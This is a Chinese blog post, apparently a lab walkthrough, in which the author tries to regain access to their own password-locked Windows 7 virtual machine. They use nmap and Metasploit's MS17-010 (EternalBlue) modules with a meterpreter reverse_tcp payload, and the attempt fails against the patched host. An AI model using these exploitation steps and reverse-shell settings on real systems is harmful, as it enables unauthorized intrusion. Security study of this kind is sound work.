win7忘记密码_通过MS17-010打进去_创建管理员账户

今天用虚拟机的时候发现忘记密码了,服了,打一下,顺便记录一下sb经过。

最后是通过其本身镜像解决,或者用u盘做一个PE

✅第一步:工具准备

  • kali ( msfconsole美少妇

第二步:漏洞扫描

复制代码
nmap -p 445,3389 192.168.200.0/24 -O

本来想用08_067,改用永恒之蓝

第三步: MS17-010

🔎 打开Metasploit控制台

复制代码
msfconsole

🔎查找漏洞模块

复制代码
search eternalblue

👉 推荐选择

  • 第一次打:选择 0

    use exploit/windows/smb/ms17_010_eternalblue //use 0

这是最经典、最直接的永恒之蓝利用方式,最常用。

👉 0 模块打不进去:

  • 选择 1

    use exploit/windows/smb/ms17_010_psexec //use 1

它结合了 SMB 执行与永恒之蓝漏洞,有时能绕过部分系统限制。

👉 只检测:

  • 选择 3

    use auxiliary/scanner/smb/smb_ms17_010 //use 3

检测目标是否存在漏洞

👉 如果目标已经被种下 DoublePulsar 后门:

  • 选择 4

    use exploit/windows/smb/smb_doublepulsar_rce //use 4

利用植入的后门远程执行代码。

最佳顺序推荐(保险打法):

  1. 先用 auxiliary/scanner/smb/smb_ms17_010 扫描确认

  2. exploit/windows/smb/ms17_010_eternalblue

  3. 如果不成功,改用 exploit/windows/smb/ms17_010_psexec

像不正常情况下像我就是知道win7并且开启了445我就直接打了先说

🔎找到后使用

复制代码
use exploit/windows/smb/ms17_010_eternalblue  //use 0

🔎在 Metasploit 中,如果你想查看当前模块有哪些可设置的参数(选项),需要用命令:

设置攻击参数

cs 复制代码
set RHOSTS 192.168.200.128
set LHOST 你的攻击机IP
set LPORT 4444   # 端口随意,一般用 4444
set payload windows/x64/meterpreter/reverse_tcp

⚠ 如果目标系统是 32 位,可以改用:

cs 复制代码
set payload windows/meterpreter/reverse_tcp

查看配置是否正确:

cs 复制代码
show options

发起攻击

cs 复制代码
exploit

打不进去

选系统

还是打不进去

🔎为什么Win7(2009_2025)、开启445,结果却显示"不存在漏洞"?

🔎如何验证 SMBv1 是否真的开启?

可以用 smbclient 工具列出 Windows 共享**:**

cs 复制代码
smbclient -L //192.168.200.128 -N

如果 StateDisabled,那就无法利用永恒之蓝。

如果确认 SMBv1 被禁用,可以尝试:

攻击 SMBv2 协议相关漏洞,如:

  • SMB Signing 绕过

  • MS17-010 失败后可以尝试 ms17_010_psexec (编号1的模块)

cs 复制代码
use exploit/windows/smb/ms17_010_psexec

报错

cs 复制代码
[-] 192.168.200.128:445 - Unable to find accessible named pipe!

|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 放弃,永恒之蓝(EternalBlue)利用的是 SMBv1 协议的漏洞(MS17-010),如果目标没有开启 SMB 服务(即使开放了 445 端口),那么永恒之蓝也无法成功利用。 #### 关键点: * 445端口开放:端口 445 本身只是 SMB 服务的端口,表示目标机器上可能开放了 SMB 服务,但并不意味着 SMB 服务一定处于可用状态。如果没有启用 SMB 服务,攻击就无法进行。 * SMB 服务:攻击需要依赖 SMB 服务中的"命名管道"来进行漏洞利用。如果目标关闭了 SMB 服务或没有开放可用的命名管道,那么漏洞无法被触发。 总结起来,如果目标没有开启 SMB 服务,即使 445 端口开放,永恒之蓝也无法攻击成功 |

这个win7是打补丁的。

相关推荐
独行soc1 小时前
#渗透测试#批量漏洞挖掘#HSC Mailinspector 任意文件读取漏洞(CVE-2024-34470)
linux·科技·安全·网络安全·面试·渗透测试
Me4神秘2 小时前
Linux国产与国外进度对垒
linux·服务器·安全
老K(郭云开)2 小时前
谷歌浏览器安全输入控件-allWebSafeInput控件
安全
Whoisshutiao3 小时前
网安-XSS-pikachu
前端·安全·网络安全
还是奇怪4 小时前
Linux - 安全排查 2
linux·运维·安全
Clownseven9 小时前
云端备份与恢复策略:企业如何选择最安全的备份解决方案
安全
薄荷椰果抹茶12 小时前
【网络安全基础】第六章---Web安全需求
安全·web安全
HumanRisk19 小时前
降低网络安全中的人为风险:以人为本的路径
网络·安全·web安全
运维开发王义杰20 小时前
金融安全生命线:用AWS EventBridge和CloudTrail构建主动式入侵检测系统
安全·金融·aws
安全系统学习1 天前
系统安全之大模型案例分析
前端·安全·web安全·网络安全·xss